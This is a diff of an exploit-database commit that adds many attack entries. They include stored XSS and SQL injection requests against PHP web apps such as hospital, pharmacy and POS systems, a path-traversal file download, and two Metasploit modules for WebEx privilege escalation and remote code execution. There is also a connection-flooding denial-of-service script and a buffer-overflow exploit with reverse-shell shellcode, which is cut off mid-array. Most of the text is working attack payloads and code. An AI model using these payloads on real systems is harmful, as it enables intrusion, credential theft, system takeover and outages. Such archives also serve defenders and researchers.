CVE-2018-18417 + +# In the 3.1 version of Ekushey Project Manager CRM, Stored XSS has been discovered in the input and upload +# sections, as demonstrated by the name parameter to the index.php/admin/client/create URI. + +# HTTP POST Request : + +POST /demo/ekushey/index.php/admin/client/create HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/demo/ekushey/index.php/admin/client +Content-Type: multipart/form-data; boundary=---------------------------19725691145690149721005243204 +Content-Length: 1576033 +Cookie: ci_session=bvug3n8aq64rpuft843qq986fhl077vq +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="name" + +"> +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="email" + +test@ismailtasdelen.me +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="password" + +Passw0rd +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="address" + +"> +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="phone" + ++100200300205 +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="website" + +https://ismailtasdelen.me +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="skype_id" + +ismailtasdelen +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="facebook_profile_link" + +ismailtasdelen +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="linkedin_profile_link" + +ismailtasdelen +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="twitter_profile_link" + +ismailtasdelen +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="short_note" + +"> +-----------------------------19725691145690149721005243204 +Content-Disposition: form-data; name="userfile"; filename="\">.jpg" +Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/php/webapps/45682.txt b/exploits/php/webapps/45682.txt new file mode 100644 index 000000000..1deaaa79b --- /dev/null +++ b/exploits/php/webapps/45682.txt @@ -0,0 +1,42 @@ +# Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection +# Date: 2018-10-24 +# Exploit Author: Boumediene KADDOUR +# Unit: Algerie Telecom R&D Unit +# Vendor Homepage: https://www.phptpoint.com/ +# Software Link: https://www.phptpoint.com/pharmacy-management-system/ +# Version: 1 +# Tested on: WAMP windows 10 x64 +# CVE: unknown + +# Description: phptpoint Pharmacy Management System SQL injection suffers from a SQL injection +# vulnerability that allows an attacker to bypass the login page and authenticate +# as admin or any other user. + +# Vulnerable Code: + +4 $username=$_POST['username']; +5 $password=$_POST['password']; +6 $position=$_POST['position']; +7 switch($position){ +8 case 'Admin': +9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE username='$username' AND password='$password'"); +10 $row=mysql_fetch_array($result); + +# Payload: + +POST /Pharmacy/index.php HTTP/1.1 +Host: 172.16.122.4 +Content-Length: 80 +Cache-Control: max-age=0 +Origin: http://172.16.122.4 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://172.16.122.4/Pharmacy/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7 +Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85 +Connection: close + +username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login \ No newline at end of file diff --git a/exploits/php/webapps/45683.txt b/exploits/php/webapps/45683.txt new file mode 100644 index 000000000..485c6902f --- /dev/null +++ b/exploits/php/webapps/45683.txt @@ -0,0 +1,75 @@ +# Exploit Title: phptpoint Hospital Management System 1.0 - 'user' SQL injection +# Date: 2018-10-24 +# Exploit Author: Boumediene KADDOUR +# Unit: Algerie Telecom R&D Unit +# Vendor Homepage: https://www.phptpoint.com/ +# Software Link: +# Version: 1 +# Tested on: WAMP windows 10 x64 +# CVE: unknown + +# Description: +# Phptpoint hospital management system suffers from multiple SQL injection vulnerabilities that +# allow an attacker to bypass the login page and authenticate with admin, and then easily +# get database information or execute arbitrary commands. + +# LOGIN.php SQL injection + + 13 extract($_POST); + 14 if(isset($signIn)) + 15 { + 16 //echo $user,$pass; + 17 //for Admin + 18 $que=mysql_query("select user,pass from admin where user='$user' and pass='$pass'"); + 19 $row= mysql_num_rows($que); + 20 echo "raw ".$row; + 21 if($row) + 22 { + 23 $_SESSION['admin'] =$user; + 24 echo ""; + +# Payload: + +POST /hospital/index.php HTTP/1.1 +Host: 172.16.122.4 +Content-Length: 38 +Cache-Control: max-age=0 +Origin: http://172.16.122.4 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://172.16.122.4/hospital/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7 +Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85 +Connection: close + +user=admin%40gmail.com'+OR+1--+&pass=anything&signIn= + +# ALIST.php SQLi + +33 $todel=$_GET['rno']; +34 mysql_query("update appt SET ashow='N' where ano='$todel' ;"); +35 } + +# DUNDEL.php SQLi + +21 $rno=$_GET["rno"]; +22 mysql_query("update doct set dshow='Y' where dno='$rno'"); +23 echo "SuccessfullyRecords Recovered"; +24 echo "Continue..."; + +# PDEL.php SQLi + +25 $todel=$_GET['rno']; +26 mysql_query("update Patient SET pshow='N' where pno='$todel' ;"); + +# PUNDEL.php SQLi + +20 $rno=$_GET["rno"]; +21 +22 +23 mysql_query("update Patient set pshow='Y' where pno='$rno'"); +24 echo "SuccessfullyRecords Recovered"; +25 echo "Continue..."; \ No newline at end of file diff --git a/exploits/php/webapps/45684.txt b/exploits/php/webapps/45684.txt new file mode 100644 index 000000000..9b54819d9 --- /dev/null +++ b/exploits/php/webapps/45684.txt @@ -0,0 +1,41 @@ +# Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html +# Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/user/chatroom.php?id=[SQL] +# +# [PATH]/user/chatroom.php +# 03 +-----------------------------158943328914318561992147220435 +Content-Disposition: form-data; name="submit" +Upload File +-----------------------------158943328914318561992147220435 +Content-Disposition: form-data; name="id" +1 +-----------------------------158943328914318561992147220435 +Content-Disposition: form-data; name="version" +-----------------------------158943328914318561992147220435 +Content-Disposition: form-data; name="hasdocs" +-----------------------------158943328914318561992147220435-- +HTTP/1.1 200 OK +Date: Thu, 24 Oct 2018 00:24:27 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1783 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + + +
+ Select document to upload: + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45686.txt b/exploits/php/webapps/45686.txt new file mode 100644 index 000000000..26b00a006 --- /dev/null +++ b/exploits/php/webapps/45686.txt @@ -0,0 +1,36 @@ +# Exploit Title: User Management 1.1 - Cross-Site Scripting +# Date: 2018-10-16 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: http://ardawan.com/ +# Software Link : http://um.ardawan.com +# Software : User Management +# Version : 1.1 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2018-18419 + +# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1, +# as demonstrated by a .jpg filename to the /account URI. + +# HTTP POST Request : + +POST /Cpanel/account HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/Cpanel/account +Content-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504 +Content-Length: 1574638 +Cookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------7088451293981732581393631504 +Content-Disposition: form-data; name="fullName" + +Admin +-----------------------------7088451293981732581393631504 +Content-Disposition: form-data; name="profileImage"; filename="\">.jpg" +Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/php/webapps/45688.txt b/exploits/php/webapps/45688.txt new file mode 100644 index 000000000..36bdd21e8 --- /dev/null +++ b/exploits/php/webapps/45688.txt @@ -0,0 +1,37 @@ +# Exploit Title: ClipBucket 2.8 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://clipbucket.com/ +# Software Link: https://sourceforge.net/projects/clipbucket/files/latest/download +# Version: 2.8.v3354 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/ajax.php + +POST /[PATH]/ajax.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 +mode=rating&id=(CASE%20WHEN%20(112=112)%20THEN%20SLEEP(5)%20ELSE%20112%20END)&rating=5&type=user +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 20:22:48 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 828 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45689.txt b/exploits/php/webapps/45689.txt new file mode 100644 index 000000000..1b3ee182f --- /dev/null +++ b/exploits/php/webapps/45689.txt @@ -0,0 +1,91 @@ +# Exploit Title: Simple POS and Inventory 1.0 - 'cat' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/php/11625/simple-pos-and-inventory-system.html +# Software Link: https://sourceforge.net/projects/simple-pos-and-inventory/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/user/plist.php?cat=[SQL] +# +# [PATH]/user/plist.php +# +# 03 +# 04 +# 05 +# 06
+# 07 +# 08
+# 09
+# 10 +# 04 +# 05 +# 06
+# 07 +# 08
+# 09
+# 10 dir +2)- Open this directory in File Manager tool in Ajenti server admin panel. \ No newline at end of file diff --git a/exploits/php/webapps/45692.txt b/exploits/php/webapps/45692.txt new file mode 100644 index 000000000..700543587 --- /dev/null +++ b/exploits/php/webapps/45692.txt @@ -0,0 +1,47 @@ +# Exploit Title: MPS Box 0.1.8.0 - 'uuid' SQL Injection +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.mpsbox.com/ +# Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download +# Version: 0.1.8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/inc/popup.qrcode.inc.php?uuid=[SQL] + +# [PATH]/inc/popup.qrcode.inc.php +# +# 24 include_once("dbfunctions.inc.php"); +# 25 +# 26 $uuid = $_GET["uuid"]; +# 27 +# 28 $db = pdo_connect(); +# 29 +# 30 $dev_data_sql = $db->query("SELECT ref_name,ip_add,model_name,serial_num FROM USR_DEVICES where uuid IN ($uuid)"); +# 31 $row_count = $dev_data_sql->rowCount(); +# 32 +# 33 ?> + +GET /[PATH]/inc/popup.qrcode.inc.php?uuid=1)+UniON+sELect+0x496873616e2053656e63616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 13:19:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=8m9cbclampf4u5n4ketdi2q997; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45693.txt b/exploits/php/webapps/45693.txt new file mode 100644 index 000000000..c83466647 --- /dev/null +++ b/exploits/php/webapps/45693.txt @@ -0,0 +1,55 @@ +# Exploit Title: Open STA Manager 2.3 - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-25 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.openstamanager.com/ +# Software Link: https://sourceforge.net/projects/openstamanager/files/latest/download +# Version: 2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/modules/backup/actions.php?op=getfile&file=[FILE] +# +# Technicians, Agents, Customers users group can run sql codes. +# +# /* `exploitdb`.`zz_users` */ +$zz_users = array( + array('idutente' => '2','username' => 'efeefeefe','password' => '$2y$10$pesWR2SHoxriSupiXsBwX.tTFdsjk9XuJoZAS/L5thFUt97LMLiyu','email' => 'efe@omerefe.com','idanagrafica' => '0','idtipoanagrafica' => '0','idgruppo' => '4','enabled' => '1','created_at' => '2018-10-25 09:30:33','updated_at' => '2018-10-25 09:32:09') +); +# +# /[PATH]/modules/backup/actions.php +# .... +# 05 switch (filter('op')) { +# 06 case 'getfile': +# 07 $file = filter('file'); +# 08 +# 09 force_download($file, file_get_contents($backup_dir.$file)); +# 10 +# 11 break; +# .... + +GET /[PATH]/modules/backup/actions.php?op=getfile&file=../../../../../Windows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=lt998mh6qs6qq2d7daj9ogdoa0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 25 Oct 2018 09:43:40 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: 0 +Cache-Control: must-revalidate, post-check=0, pre-check=0, private +Pragma: public +Content-Disposition: attachment; filename="win.ini"; +Content-Transfer-Encoding: binary +Content-Length: 564 +X-Robots-Tag: noindex +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/local/45696.rb b/exploits/windows/local/45696.rb new file mode 100755 index 000000000..48e1f6a33 --- /dev/null +++ b/exploits/windows/local/45696.rb @@ -0,0 +1,202 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Services + include Msf::Post::Windows::Accounts + + def initialize(info={}) + super( update_info( info, + 'Name' => 'WebEx Local Service Permissions Exploit', + 'Description' => %q{ + This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, + can be used to run arbitrary commands locally, and can be started by limited users in + default installations. + }, + 'References' => + [ + ['URL', 'https://webexec.org'], + ['CVE', '2018-15442'] + ], + 'DisclosureDate' => "Oct 09 2018", + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeff McJunkin ' + ], + 'Platform' => [ 'win'], + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'SessionTypes' => [ "meterpreter" ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'WfsDelay' => 5, + 'ReverseConnectRetries' => 255 + }, + 'DefaultTarget' => 0 + )) + + register_options([ + OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"]) + ]) + @service_name = 'webexservice' + end + + def validate_arch + return target unless target.name == 'Automatic' + + case sysinfo['Architecture'] + when 'x86' + fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64' + vprint_status('Detected x86 system') + return targets[1] + when 'x64' + vprint_status('Detected x64 system') + return targets[2] + end + end + + def check_service_exists?(service) + srv_info = service_info(service) + + if srv_info.nil? + vprint_warning("Unable to enumerate services.") + return false + end + + if srv_info && srv_info[:display].empty? + vprint_warning("Service #{service} does not exist.") + return false + else + return true + end + end + + def check + unless check_service_exists?(@service_name) + return Exploit::CheckCode::Safe + end + + srv_info = service_info(@service_name) + + vprint_status(srv_info.to_s) + + case START_TYPE[srv_info[:starttype]] + when 'Disabled' + vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") + return Exploit::CheckCode::Safe + when 'Manual' + vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") + return Exploit::CheckCode::Safe + when 'Auto' + vprint_good("Service is set to Automatically start...") + end + + if check_search_path + return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Appears + end + + def check_write_access(path) + perm = check_dir_perms(path, @token) + if perm and perm.include?('W') + print_good("Write permissions in #{path} - #{perm}") + return true + elsif perm + vprint_status ("Permissions for #{path} - #{perm}") + else + vprint_status ("No permissions for #{path}") + end + + return false + end + + + def exploit + begin + @token = get_imperstoken + rescue Rex::Post::Meterpreter::RequestError + vprint_error("Error while using get_imperstoken: #{e}") + end + + fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token + + if is_system? + fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.") + end + + print_status("Checking service exists...") + if !check_service_exists?(@service_name) + fail_with(Failure::NoTarget, "The service doesn't exist.") + end + + if is_uac_enabled? + print_warning("UAC is enabled, may get false negatives on writable folders.") + end + + # Use manually selected Dir + file_path = datastore['DIR'] + + @exe_file_name = Rex::Text.rand_text_alphanumeric(8) + @exe_file_path = "#{file_path}\\#{@exe_file_name}.exe" + + service_information = service_info(@service_name) + + # Check architecture + valid_arch = validate_arch + exe = generate_payload_exe(:arch => valid_arch.arch) + + # + # Drop the malicious executable into the path + # + print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...") + begin + write_file(@exe_file_path, exe) + register_file_for_cleanup(@exe_file_path) + rescue Rex::Post::Meterpreter::RequestError => e + # Can't write the file, can't go on + fail_with(Failure::Unknown, e.message) + end + + # + # Run the service + # + print_status("Launching service...") + res = cmd_exec("cmd.exe", + "/c sc start webexservice install software-update 1 #{@exe_file_path}") + + if service_restart(@service_name) + print_status("Service started...") + else + service_information = service_info(@service_name) + if service_information[:starttype] == START_TYPE_AUTO + if job_id + print_status("Unable to start service, handler running waiting for a reboot...") + while(true) + break if session_created? + select(nil,nil,nil,1) + end + else + fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...") + end + else + fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...") + end + end + end +end \ No newline at end of file diff --git a/exploits/windows/dos/45658.txt b/exploits/windows/remote/45658.txt similarity index 100% rename from exploits/windows/dos/45658.txt rename to exploits/windows/remote/45658.txt diff --git a/exploits/windows/remote/45695.rb b/exploits/windows/remote/45695.rb new file mode 100755 index 000000000..f46781ca8 --- /dev/null +++ b/exploits/windows/remote/45695.rb @@ -0,0 +1,187 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# Windows XP systems that are not part of a domain default to treating all +# network logons as if they were Guest. This prevents SMB relay attacks from +# gaining administrative access to these systems. This setting can be found +# under: +# +# Local Security Settings > +# Local Policies > +# Security Options > +# Network Access: Sharing and security model for local accounts + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::SMB::Client::WebExec + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WebExec Authenticated User Code Execution', + 'Description' => %q{ + This module uses a valid username and password of any level (or + password hash) to execute an arbitrary payload. This module is similar + to the "psexec" module, except allows any non-guest account by default. + }, + 'Author' => + [ + 'Ron ', + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'thread' + }, + 'References' => + [ + ['URL', 'https://webexec.org'], + [ 'CVE', '2018-15442' ], + ], + 'Payload' => + { + 'Space' => 3072, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'Native upload', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 24 2018' + )) + + register_options( + [ + # This has to be a full path, %ENV% variables are not expanded + OptString.new('TMPDIR', [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ]) + ]) + + register_advanced_options( + [ + OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]), + OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]), + ]) + end + + # This is the callback for cmdstager, which breaks the full command into + # chunks and sends it our way. We have to do a bit of finangling to make it + # work correctly + def execute_command(command, opts) + # Replace the empty string, "", with a workaround - the first 0 characters of "A" + command = command.gsub('""', 'mid(Chr(65), 1, 0)') + + # Replace quoted strings with Chr(XX) versions, in a naive way + command = command.gsub(/"[^"]*"/) do |capture| + capture.gsub(/"/, "").chars.map do |c| + "Chr(#{c.ord})" + end.join('+') + end + + # Prepend "cmd /c" so we can use a redirect + command = "cmd /c " + command + + execute_single_command(command, opts) + end + + def exploit + print_status("Connecting to the server...") + connect(versions: [2,1]) + + print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") + smb_login + + if not simple.client.auth_user and not datastore['ALLOW_GUEST'] + print_line(" ") + print_error( + "FAILED! The remote host has only provided us with Guest privileges. " + + "Please make sure that the correct username and password have been provided. " + + "Windows XP systems that are not part of a domain will only provide Guest privileges " + + "to network logins by default." + ) + print_line(" ") + disconnect + return + end + + begin + if datastore['SMBUser'].to_s.strip.length > 0 + report_auth + end + + # Avoid implementing NTLMSSP on Windows XP + # http://seclists.org/metasploit/2009/q1/6 + if smb_peer_os == "Windows 5.1" + connect(versions: [1]) + smb_login + end + + wexec(true) do |opts| + opts[:flavor] = :vbs + opts[:linemax] = datastore['MAX_LINE_LENGTH'] + opts[:temp] = datastore['TMPDIR'] + opts[:delay] = 0.05 + execute_cmdstager(opts) + end + handler + disconnect + end + + end + + def report_auth + service_data = { + address: ::Rex::Socket.getaddress(datastore['RHOST'],true), + port: datastore['RPORT'], + service_name: 'smb', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: self.fullname, + private_data: datastore['SMBPass'], + username: datastore['SMBUser'].downcase + } + + if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' + credential_data.merge!({ + realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, + realm_value: datastore['SMBDomain'] + }) + end + + if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ + credential_data.merge!({:private_type => :ntlm_hash}) + else + credential_data.merge!({:private_type => :password}) + end + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + access_level: 'Admin', + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + + login_data.merge!(service_data) + create_credential_login(login_data) + end +end \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45679.py b/exploits/windows_x86-64/dos/45679.py new file mode 100755 index 000000000..5c1aa6801 --- /dev/null +++ b/exploits/windows_x86-64/dos/45679.py @@ -0,0 +1,35 @@ +# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://borgchat.10n.ro +# Software Link: http://borgchat.10n.ro/download.php +# Version: 1.0.0 build 438 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) + +#!/usr/bin/python +import socket +print "# # # # # # # #" +print "BORGChat 1.0.0" +print "# # # # # # # #" +print "\r\n" +Ip = raw_input("[Ip]: ") +Port = 7551 # Default port + +arr=[] +c=0 +while 1: + try: + arr.append(socket.create_connection((Ip,Port))) + arr[c].send("DOOM") + print "Sie!" + c+=1 + except socket.error: + print "++ Done! ++" + raw_input() + break \ No newline at end of file diff --git a/exploits/windows_x86/local/45687.txt b/exploits/windows_x86/local/45687.txt new file mode 100644 index 000000000..9dc319843 --- /dev/null +++ b/exploits/windows_x86/local/45687.txt @@ -0,0 +1,55 @@ +# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH) +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Discovery Date: 2018-10-25 +# Homepage: http://www.armcode.com/adult-filter/ +# Software Link: http://www.armcode.com/downloads/adult-filter.exe +# Version: 1.0 +# Tested on: Windows XP Professional SP3 (ENG) +# Steps to Reproduce: Run the python exploit script, it will create a new file +# with the name "greetz-phr-key-onkan-cwd.txt". +# Start Adult Filter 1.0 click "Options" click "Black Domain List" click "Import" +# Select "greetz-cwd-onkan-key-phr.txt" and Click after select "name.txt" "OK" connect victim machine on port 1907 + +#!/usr/bin/python -w + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" +# Payload size: 351 bytes + +filename="greetz-cwd-onkan-key-phr.txt" +shellcode=("\xba\x80\xfe\xaf\x95\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" +"\x52\x83\xee\xfc\x31\x56\x0e\x03\xd6\xf0\x4d\x60\x2a\xe4\x10" +"\x8b\xd2\xf5\x74\x05\x37\xc4\xb4\x71\x3c\x77\x05\xf1\x10\x74" +"\xee\x57\x80\x0f\x82\x7f\xa7\xb8\x29\xa6\x86\x39\x01\x9a\x89" +"\xb9\x58\xcf\x69\x83\x92\x02\x68\xc4\xcf\xef\x38\x9d\x84\x42" +"\xac\xaa\xd1\x5e\x47\xe0\xf4\xe6\xb4\xb1\xf7\xc7\x6b\xc9\xa1" +"\xc7\x8a\x1e\xda\x41\x94\x43\xe7\x18\x2f\xb7\x93\x9a\xf9\x89" +"\x5c\x30\xc4\x25\xaf\x48\x01\x81\x50\x3f\x7b\xf1\xed\x38\xb8" +"\x8b\x29\xcc\x5a\x2b\xb9\x76\x86\xcd\x6e\xe0\x4d\xc1\xdb\x66" 